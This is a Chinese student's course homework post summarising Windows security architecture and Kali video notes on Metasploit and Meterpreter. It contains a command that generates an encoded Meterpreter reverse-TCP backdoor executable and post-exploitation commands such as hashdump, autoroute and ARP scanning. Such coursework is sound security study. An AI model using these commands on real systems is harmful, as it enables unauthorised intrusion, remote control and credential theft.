网络攻防第七次作业

教材第七章

Windows操作系统的基本结构

Windows操作系统内核的基本模块包括如下:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码、系统支持进程、环境子系统服务进程、服务进程、用户应用软

件、核心子系统DLL。在上述系统架构下,Windows操作系统内核中实现了如下的核心机制。Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络

机制。

Windows操作系统的安全体系结构与机制

Windows操作系统基于引用监控器模型来实现基本的对象安全模型。Windows的安全机制包括Windows身份认证机制、Windows授权与访问控制价机制、Windows安全审计机制、Windows的其他安全机制。保护

Windows系统安全稳定运行最为关键的三项安全措施是防火墙、补丁自动更新以及病毒防护。

Windows系统安全攻防技术

Windows系统远程安全攻防技术包括远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户。Windows本地安全攻防技术有Windows本地特权提升、Windows敏感信息窃取、Windows消踪灭

迹、Windows远程控制与后门程序。

Metasploit使用

在kali中使用metasploit,需要先开启PostgreSQL数据库鼓舞和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。命令为service postgresql startservice metasploit start

 

kali视频学习

漏洞利用之Metasploit基础

Auxiliary:辅助模块

encoders:供msfencode编码工具使用

exploits:攻击模块

payloads:这里面里出的是攻击载荷,也就是攻击成功后执行的代码

post:后渗透阶段模块,在获得metepreter的shell之后可以使用的攻击代码。

这是因为kali 2.0已经没有metasploit这个服务了,所以使用命令service metasploit start的方式不起作用。

在kali 2.0中启动带数据库支持的MSF方式如下:

首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start。初始化MSF数据库(关键步骤!):msfdb init。运行msfconsole:msfconsole。在msf中查看数据库连接状态:

db_status。运行成功之后截图如下。

漏洞利用之Meteoreter介绍

meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。

meterpreter命令由核心命令和扩展库命令组成,可以添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、补货案件信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

常用命令:

background:将当前会话放置后台

load/use:加载模块

Interact:切换进一个信道

migrate:迁移进程

run:执行一个已有模块,输入run后按两下tab,会列出所有已有脚本,常用的有autoroute、hashdump、arp_scanner、multi_meter_inject

Resource:执行一个已有的rc脚本,常用的为payload/windows/meterpreter/reverse_tcp

生成Meterpreter后门命令:

msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.69.156 LPORT=2333 R | msfencode -t exe -c 5 > /root.door.exe

漏洞利用之Metasploit后渗透测试

  1. 查看网卡信息
  2. 添加路由表:run autoroute -s 10.0.0.1
  3. 开socks代理:通过使用 auxiliary/server/socks4a 模块,可以为浏览器,Sqlmap,Nmap等使用
  4. 通过Background和sessions -i可以自由切换进入session
  5. 输入run可以看到在meterpreter上可以做到的很多命令
  6. 通过run post/可以看到后渗透测试的模块
  7. 获取内网信息:run arp_scanner -r 10.0.0.1/24
  8. 上传文件,做端口转发后进行后续测试

漏洞利用之BeFF

 

posted on 2019-04-14 21:51  GeneralPrinceSpectre  阅读(170)  评论(0编辑  收藏  举报